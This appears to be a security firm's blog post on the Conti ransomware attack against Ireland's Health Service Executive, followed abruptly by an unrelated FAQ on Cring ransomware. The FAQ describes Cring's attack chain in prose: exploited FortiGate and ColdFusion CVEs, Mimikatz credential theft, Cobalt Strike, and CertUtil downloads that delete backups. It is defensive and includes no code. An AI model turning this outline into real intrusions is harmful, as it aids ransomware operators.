In the early hours of May 14th, it was revealed that a sophisticated ransomware attack had taken place against the IT systems of the Irish Health Service Executive (HSE). Information is still coming to light, but it is known that a human-operated, externally based threat group deployed a variant of the ‘Conti’ ransomware; this ransomware is considered the successor of the dangerous ‘Ryuk’.
The focus of the operation was to access central servers storing sensitive information for exfiltration and encryption. All HSE IT systems were shut down to mitigate the spread of the ransomware and provide an opportunity for internal HSE resources and the third parties they have engaged to assess the scope of the attack and implement recovery procedures.
The point of ingress for the attack currently appears to be the shared patient registration system common to all HSE-operated institutes. It is suspected that a zero-day exploit was leveraged against this system to gain access and deploy the ransomware. A zero-day exploit may indicate an Advanced Persistent Threat (APT) type of involvement, as often only these groups have the skills and resources required to successfully identify and exploit such vulnerabilities. The presence of a Cobalt Strike Beacon was also suspected. Cobalt Strike is a tool used by threat actors to execute targeted attacks against enterprise environments.
The Sapphire Security Operations Centre (SOC) is continuing to monitor the situation, engaging with our threat intelligence resources to identify threat indicators and will respond to developments and additional information as it becomes available.
The threat indicators available for ‘Conti’ have been integrated into the SOC, with custom rules and alerting implemented. These rules will alert analysts to the presence of files related to ‘Conti’ and communication with C2 sites, URLs, specific user agents and changes to files indicating they have been encrypted by the ransomware. The Sapphire SOC also monitors activity from various tools attackers use, including Cobalt Strike.
Sapphire will continue to gather threat intelligence from various sources, including our threat intelligence partners, who collect intelligence from open and closed sources. As more information becomes available, emphasis will shift from definable and known indicators, such as hash values and IP addresses, to behavioural identification, helping to provide further detection when the specifics of the ransomware and indicators of compromise have been further changed or adapted.
Zero-day vulnerabilities, whilst rare can offer attackers a method of successful exploitation. Mitigating steps can be taken to limit the likelihood of success:
- External Facing services, such as portals, registration pages, and hosts, should be kept updated with the latest Operating System and application patches and configured securely.
- Internet-facing remote access should be restricted and placed behind a Next Generation Firewall, enforcing encryption and supporting multi-factor authentication.
- Granular roll-based access control (RBAC) will reduce the likelihood of any one account being able to perform the entire attack.
- Deploying Endpoint Detection and Response (EDR) can be used to prevent malware and exploits targeting zero-day vulnerabilities.
- Multiple back-ups should be produced with at least one stored offline. Back-up data should be regularly tested for reliability.
Frequently Asked Questions on Cring Ransomware
- How Does Cring Ransomware Infect an Organisation’s Network?
When Cring operators get access to IP addresses of internet-facing vulnerable devices, an unauthenticated hacker can connect the appliance through the public internet. The attackers remotely access a session file containing the username and password stored in a clear text file.
Cring operators use fairly sophisticated techniques to hide their files, inject code into the memory and hide their tracks by over-writing files with garbled data or deleting logs and other traces that threat hunters could use to investigate them.
- What are Some Cring Ransomware Techniques?
a). Initial Access
Either through insecure or compromised RDP or legitimate accounts, the Cring ransomware initially gains access. The ransomware can also access the system through certain vulnerability exploits.
The threat has recently evolved to use the previously known Adobe ColdFusion vulnerability (CVE-2010-2861) to infiltrate the ColdFusion server remotely. In the past, Cring was also utilised to exploit a FortiGate VPN server flaw (CVE-2018-13379).
b). Credential Access
The threat actors behind Cring carried out their attacks using weaponised tools. Mimikatz is one of these programs, and it was used to collect login information from users who had already signed into the system.
c). Lateral Movement and Defense Evasion
Cobalt Strike was used to travel laterally. Additionally, this tool was used to disseminate BAT files that will be employed for various applications, including weakening the system’s defences.
d). Command and Control and Execution
The primary command-and-control (C&C) server used Cobalt Strike to communicate continuously.
BAT files were used to download and run the Cring ransomware on the other systems in the compromised network. It also utilises the Windows CertUtil program to assist with the download above.
When Cring is run on a computer, it stops any services and processes that could interfere with the ransomware’s encryption operation. The threat also deletes backup folders and files, making it challenging for the victim to recover the encrypted files, increasing the pressure on them to pay the ransom. After the ransomware finishes its encryption process, it will use a BAT file to remove itself.
- What is Cring File Decryption?
The Cring file decryption is a straightforward way to retrieve encrypted files, and it is only carried out if there is a matching decryption key retrieved from the attackers behind the infection.
You should not send money to hackers to regain access, as you may still be left with many inaccessible files or a non-working decryption key.
- How Do I Keep Systems Protected from Cring Ransomware Attacks?
There are several ways experts recommend to keep your systems safe from Cring operators, and they include:
- Updating the VPN Gateway firmware to the latest versions
- Updating the endpoint protection solutions and their databases to the latest versions
- Restricting VPN access between facilities and closing all the ports that are not needed by operational needs
- Ensuring all the modules of endpoint protection solutions are enabled.
- Configuring the backup system to store backup files on a dedicated server
- Ensure the active directory policy only permits the users to log in to systems needed by the operational needs
- To enhance your organisation’s resistance to potential ransomware attacks by implementing Endpoint Detection and Response-type security solutions on your IT and OT networks.
- Adapt Managed Detection and Response services to get access to the highest skill levels and knowledge from professional security experts
- Incorporate dedicated protection for the industrial processes